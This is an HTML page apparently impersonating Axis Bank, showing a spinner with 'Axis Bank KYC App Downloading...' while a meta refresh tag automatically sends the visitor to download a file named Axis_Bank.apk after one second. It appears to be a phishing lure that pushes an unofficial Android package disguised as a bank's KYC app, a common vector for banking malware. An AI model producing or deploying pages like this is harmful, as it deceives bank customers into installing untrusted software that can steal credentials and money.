<!DOCTYPE html>
<html>
  <head>
  <meta
  http-equiv="Content-Language"
  content="fr">
  <meta
  http-equiv="refresh"
  content="1;
  URL=Axis_Bank.apk">
    <meta name="theme-color" content="#A6004D">
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Downloading...</title>
    <link rel="stylesheet" href="Axis.css" data-n-g="" />
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Work+Sans&display=swap" rel="stylesheet">
    <style type="text/css">
          .para span,.text-center
          {text-align:center}
          .circlespinner
          {animation:rotate 2s linear infinite;
          width:50px;
          height:75px;
          stroke:#F9F9FB;}
          
          .path
          {stroke:#a6004d;
          stroke-linecap:round;
          animation:dash 1.5s ease-in-out infinite}
          @keyframes rotate{to
          {transform:rotate(1turn)}}
          @keyframes dash{0%
          {stroke-dasharray:1,150;stroke-dashoffset:0}50%
          {stroke-dasharray:90,150;stroke-dashoffset:-35}
          to
          {stroke-dasharray:90,150;
          stroke-dashoffset:-125}}
          .l-loading
          {margin-top:80px;}
          
          .form-group .invalid-message
          {
          font-size:12px;
          color:red;
          }
    </style>
    <noscript data-n-css=""></noscript>
  </head>
  <body>
    <div id="__next">
      <div class="text-center l-loading">
        <svg class="circlespinner" viewBox="0 0 50 50">
          <circle class="path" cx="25" cy="25" r="20" fill="none" stroke-width="5"></circle>
        </svg>
        <h1 style="font-size:14px; color:grey; font-family: 'Work Sans', sans-serif;">Please wait...<br><br>Axis Bank KYC App Downloading...</h1>
      </div>
    </div>
  </body>
</html>